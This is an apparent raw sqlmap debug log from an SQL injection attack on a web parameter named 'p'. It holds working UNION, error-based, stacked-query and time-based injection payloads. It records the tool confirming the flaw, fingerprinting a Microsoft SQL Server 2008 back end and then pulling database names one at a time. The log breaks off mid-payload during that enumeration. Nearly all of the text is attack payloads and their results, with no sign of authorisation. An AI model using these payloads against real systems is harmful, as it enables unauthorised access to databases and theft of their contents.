[DEBUG] skipping test 'Firebird error-based - Parameter replace' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses' because the 
payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and ORDER BY clauses' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'Oracle error-based - GROUP BY and ORDER BY clauses' because the payload for error-based has already been identified [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (heavy query)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (heavy query)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy query)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'Firebird stacked queries (heavy query)' because the payload for stacked queries has already been identified [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based 
blind' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind (comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind (comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 
'SQLite > 2.0 AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 OR time-based blind' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'Firebird OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 1 to 10 columns' because the back-end DBMS identified is Microsoft SQL Server [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 11 to 20 columns' because the level is higher than the provided [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 21 to 
30 columns' because the level is higher than the provided [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 31 to 40 columns' because the level is higher than the provided [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 41 to 50 columns' because the level is higher than the provided [09:55:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [09:55:33] [PAYLOAD] 20111' UNION ALL SELECT NULL-- AND 'vrjZ'='vrjZ [09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL-- AND 'GZNB'='GZNB [09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL-- AND 'dLhE'='dLhE [09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND 'XeTw'='XeTw [09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND 'trjE'='trjE [09:55:36] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:36] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND 'rjRE'='rjRE [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'vmHq'='vmHq [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'ZBcW'='ZBcW [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'qhhM'='qhhM [09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'OaNn'='OaNn [09:55:38] [DEBUG] got HTTP error code: 500 
(Internal Server Error) [09:55:38] [INFO] target url appears to be UNION injectable with 3 columns [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(100)+CHAR(102)+CHAR(99)+CHAR(99) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND 'VYhx'='VYhx [09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:39] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(102)+CHAR(86)+CHAR(76)+CHAR(122) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'TyzA'='TyzA [09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:39] [PAYLOAD] 20111' UNION ALL SELECT CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(116)+CHAR(101)+CHAR(83)+CHAR(98) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND 'bKpM'='bKpM [09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:40] [PAYLOAD] -8546' UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(76)+CHAR(119)+CHAR(88)+CHAR(66) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'HwBz'='HwBz [09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:40] [PAYLOAD] -2422' UNION ALL SELECT CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(106)+CHAR(68)+CHAR(90)+CHAR(75) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND 'hiSw'='hiSw [09:55:41] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:41] [PAYLOAD] -9676' UNION ALL SELECT NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(111)+CHAR(120)+CHAR(102)+CHAR(77) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND 'FIBp'='FIBp [09:55:43] [DEBUG] got HTTP error code: 500 
(Internal Server Error) [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 11 to 20 columns' because the level is higher than the provided [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 21 to 30 columns' because the level is higher than the provided [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 31 to 40 columns' because the level is higher than the provided [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 50 columns' because the level is higher than the provided [09:55:43] [INFO] GET parameter 'p' is vulnerable. Do you want to keep testing the others? [y/N] N [09:55:43] [DEBUG] used the default behaviour, running in batch mode sqlmap identified the following injection points with a total of 30 HTTP(s) requests: --- Place: GET Parameter: p Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=20111' AND 4255=4255 AND 'obQa'='obQa Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: p=20111' AND 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: p=20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: p=20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua --- [09:55:43] [INFO] testing Microsoft SQL Server [09:55:43] [PAYLOAD] 20111' AND 876=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (BINARY_CHECKSUM(76)=BINARY_CHECKSUM(76)) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'XHDB'='XHDB [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:44] [INFO] retrieved: 1 [09:55:44] [DEBUG] performed 1 queries in 0 seconds [09:55:44] 
[INFO] confirming Microsoft SQL Server [09:55:44] [PAYLOAD] 20111' AND 2557=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (HOST_NAME()=HOST_NAME()) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'eONH'='eONH [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:44] [INFO] retrieved: 1 [09:55:44] [DEBUG] performed 1 queries in 0 seconds [09:55:44] [PAYLOAD] 20111' AND 1181=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (XACT_STATE()=XACT_STATE()) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'erPM'='erPM [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:44] [INFO] retrieved: 1 [09:55:44] [DEBUG] performed 1 queries in 0 seconds [09:55:44] [PAYLOAD] 20111' AND 2691=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (SYSDATETIME()=SYSDATETIME()) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ZLNT'='ZLNT [09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:45] [INFO] retrieved: 1 [09:55:45] [DEBUG] performed 1 queries in 0 seconds [09:55:45] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows Vista web application technology: ASP.NET, Microsoft IIS 7.0 back-end DBMS: Microsoft SQL Server 2008 [09:55:45] [INFO] fetching database names [09:55:45] [PAYLOAD] 20111' AND 7776=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'IIWR'='IIWR [09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:45] [INFO] the SQL query used returns 37 entries [09:55:45] [PAYLOAD] 20111' AND 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), 
CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh [09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:46] [PAYLOAD] 20111' AND 5378=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 1 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'nEZn'='nEZn [09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:46] [PAYLOAD] 20111' AND 3153=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 2 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'PAcn'='PAcn [09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:47] [PAYLOAD] 20111' AND 2020=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 3 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'KnEl'='KnEl [09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:47] [PAYLOAD] 20111' AND 8124=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 4 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'vwnC'='vwnC [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:48] [PAYLOAD] 20111' AND 
5203=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 5 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'SomT'='SomT [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:48] [PAYLOAD] 20111' AND 2545=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 6 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'acLW'='acLW [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:48] [PAYLOAD] 20111' AND 6353=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 7 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'yXeO'='yXeO [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:49] [PAYLOAD] 20111' AND 6404=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 8 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'meBT'='meBT [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:49] [PAYLOAD] 20111' AND 5366=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 9 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 
'VLNB'='VLNB [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:49] [PAYLOAD] 20111' AND 3216=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 10 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GzkG'='GzkG [09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:49] [PAYLOAD] 20111' AND 9590=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 11 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'TbNN'='TbNN [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:50] [PAYLOAD] 20111' AND 8955=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 12 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gFlv'='gFlv [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:50] [PAYLOAD] 20111' AND 5205=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 13 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'mJMn'='mJMn [09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:50] [PAYLOAD] 20111' AND 7416=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 14 name FROM 
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'lNwo'='lNwo [09:55:51] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:51] [PAYLOAD] 20111' AND 2571=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 15 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GvrD'='GvrD [09:55:52] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:52] [PAYLOAD] 20111' AND 3907=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 16 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'copc'='copc [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:53] [PAYLOAD] 20111' AND 2836=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 17 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'cbyQ'='cbyQ [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:53] [PAYLOAD] 20111' AND 2761=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 18 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ajnb'='ajnb [09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:53] [PAYLOAD] 20111' AND 4326=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 
ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 19 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'iIBt'='iIBt [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:54] [PAYLOAD] 20111' AND 6793=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 20 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'NIeI'='NIeI [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:54] [PAYLOAD] 20111' AND 4300=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 21 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gTCQ'='gTCQ [09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:54] [PAYLOAD] 20111' AND 9109=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 22 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'fkxe'='fkxe [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:55] [PAYLOAD] 20111' AND 4177=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 23 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GsiT'='GsiT [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) 
[09:55:55] [PAYLOAD] 20111' AND 4909=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 24 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'OSmP'='OSmP [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:55] [PAYLOAD] 20111' AND 5597=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 25 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'pmtB'='pmtB [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:56] [PAYLOAD] 20111' AND 445=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 26 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'COwJ'='COwJ [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:56] [PAYLOAD] 20111' AND 5653=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 27 name FROM 